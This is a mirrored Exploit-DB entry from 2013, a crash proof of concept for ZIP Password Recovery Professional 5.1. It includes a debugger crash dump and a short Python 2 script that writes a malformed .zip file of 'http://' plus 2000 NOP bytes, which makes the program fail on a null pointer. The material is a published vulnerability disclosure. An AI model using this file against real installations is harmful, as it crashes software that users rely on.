ZIP Password Recovery Professional 5.1 – ‘.zip’ Crash (PoC) - 体验盒子

作者： KAI

日期： 2013-11-30

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/29934/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

# Exploit Title:ZIP Password Recovery Professional 5.1 (.zip) - Crash POC

# Date: 30.11.2013

# Exploit Author: KAI - (KAISAI12)

# Version: 5.1

# Vendor Homepage: http://www.recoverlostpassword.com/

# Tested on: [ Windows 7]

#============================================================================================

# After creating POC file (.zip), Add File To Program

#============================================================================================

# Contact :

#------------------

# Web Page : http://www.ceh.vn

#============================================================================================

#This exception may be expected and handled.

#eax=ffffff9a ebx=00000001 ecx=00000000 edx=00000000 esi=014b4f90 edi=001ec7d4

#eip=1000455c esp=001ec138 ebp=001ec2c8 iopl=0 nv up ei ng nz na pe nc

#cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010286

#*** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files\ZIP Password Recovery Professional\ZipPasswordCrack.dll -

#ZipPasswordCrack!CZipPasswordCrack::operator=+0x2f9c:

#1000455c 837a5000cmp dword ptr [edx+50h],0 ds:0023:00000050=????????

#!/usr/bin/python

head = "x68\x74\x74\x70\x3a\x2f\x2f"

buf = "\x90"*2000

try:

fo=open("zipcrack.zip","w");

fo.write(head+buf);

fo.close();

print "create succsess file"

except:

print "create error !"